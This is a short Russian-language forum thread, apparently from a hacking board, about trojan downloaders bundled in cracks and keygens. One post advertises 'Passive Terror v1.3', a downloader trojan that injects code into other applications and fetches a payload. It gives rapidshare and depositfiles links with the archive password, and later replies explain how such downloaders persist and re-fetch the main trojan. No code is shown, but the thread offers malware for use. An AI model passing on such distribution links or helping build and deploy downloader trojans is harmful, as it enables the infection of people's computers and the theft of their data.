Часто встречался такой троянчег в старых кряках и кейгенах. Я так понял, этот троян скачивает пинча или что то другое с сайта и запускает его?
Многофункциональный web downloader, использующий fwbp+ технологию. Программа внедряет код в произвольное приложение, затем загружает выбранный файл. Серверная часть Трояна написана на ассемблере, билдер на Visual Basic. _http://rapidshare.com/files/109343512/Passive_Terror_v1.3_Final_Edition.rar _http://depositfiles.com/files/4890609 Pass: 1
прикольно.... "серверная часть"... к ней что коннектится надо??? зачем, если дискредитировано чужое приложение , то и коннектится можно сразу к месту где лежит троян....
А собственно для чего коннект к серверу, если файло и так можно скачать. Сокеты/WinInet? Zolden Немного это не то...
смысл давнлоадеров в их размере. они обычно занимают несколько килобайт. плюс некоторые прописываються в автозагрузку, и при удалении основного трояна могут его заново перекачать и запустить